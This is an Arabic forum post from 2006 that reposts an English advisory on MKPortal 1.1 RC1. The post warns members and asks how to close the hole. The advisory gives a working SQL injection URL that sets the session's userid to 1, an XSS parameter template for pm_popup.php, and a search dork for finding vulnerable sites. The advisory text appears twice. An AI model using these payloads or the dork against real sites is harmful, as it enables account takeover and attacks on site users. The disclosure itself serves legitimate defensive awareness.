شبكة ابن الخليج - عرض مشاركة واحدة

rwsy · 05-17-2006, 06:47 مساءً

بسم الله الرحمن الرحيم

صار لثغرة تقريبا شهر نازله في المواقع نزلت في نصف شهر 4 يعني بدري وجديده الثغرة

الثغرة في الأصدار المجلة:MKPortal M1.1 Rc1

الحل على ما اظن ترقيت المجلة الى اخر نسخة او الذهاب الى موقع الشركة http://www.mkportal.it

الثغرة:

Vendor: MKPortal (http://www.mkportal.it/)
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
about: Via this methods remote attacker can inject arbitrary SQL queries to ind parameter in index.php of MKPortal.
Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it easy to
by pass this SQL update function.
Also there is cross-site scripting vulnerability in pm_popup.php the parameters u1,m1,m2,m3,m4 did not sanitized properly.
Level: Critical
---
How&Example:
SQL Injection :

GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL]
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1
So with this example remote attacker updates his session's userid to 1 and after refreshing the page he can logs as userid 1.

XSS:
GET -> http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]

---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
Click here and get exploit for this advisory
---
Dorks: "MKPortal 1.1 RC1"

ارجوا الحذر من الثغرة هذا فهي خطيرة جدا ارجوا من الأخوة البحث ومعرفة سد الثغرة

أسمراني
http://www.traidnt.net/vb/showthread.php?t=151015

05-17-2006, 06:47 مساءً	#1 (permalink)
rwsy عضو فعــال تاريخ التسجيل: Feb 2006 المشاركات: 171 معدل تقييم المستوى: 196	الاخ الادمن شو بخصوص هذه الثغرة بسم الله الرحمن الرحيم صار لثغرة تقريبا شهر نازله في المواقع نزلت في نصف شهر 4 يعني بدري وجديده الثغرة الثغرة في الأصدار المجلة:MKPortal M1.1 Rc1 الحل على ما اظن ترقيت المجلة الى اخر نسخة او الذهاب الى موقع الشركة http://www.mkportal.it الثغرة: Vendor: MKPortal (http://www.mkportal.it/) Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!) about: Via this methods remote attacker can inject arbitrary SQL queries to ind parameter in index.php of MKPortal. Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it easy to by pass this SQL update function. Also there is cross-site scripting vulnerability in pm_popup.php the parameters u1,m1,m2,m3,m4 did not sanitized properly. Level: Critical --- How&Example: SQL Injection : GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL] EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1 So with this example remote attacker updates his session's userid to 1 and after refreshing the page he can logs as userid 1. XSS: GET -> http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS] --- Timeline: * 21/04/2006: Vulnerability found. * 21/04/2006: Contacted with vendor and waiting reply. --- Exploit: Click here and get exploit for this advisory --- Dorks: "MKPortal 1.1 RC1" ارجوا الحذر من الثغرة هذا فهي خطيرة جدا ارجوا من الأخوة البحث ومعرفة سد الثغرة أسمراني http://www.traidnt.net/vb/showthread.php?t=151015 من مواضيع rwsy في المنتدى موديل اذاعة القران الكريم بلوك مواقع صديقه مشلكة مشكلة [module][All] المركز الإخباري طريقة تعديل نوع الخط ولونه وحجمه والمحاذاة وذلك في المواضيع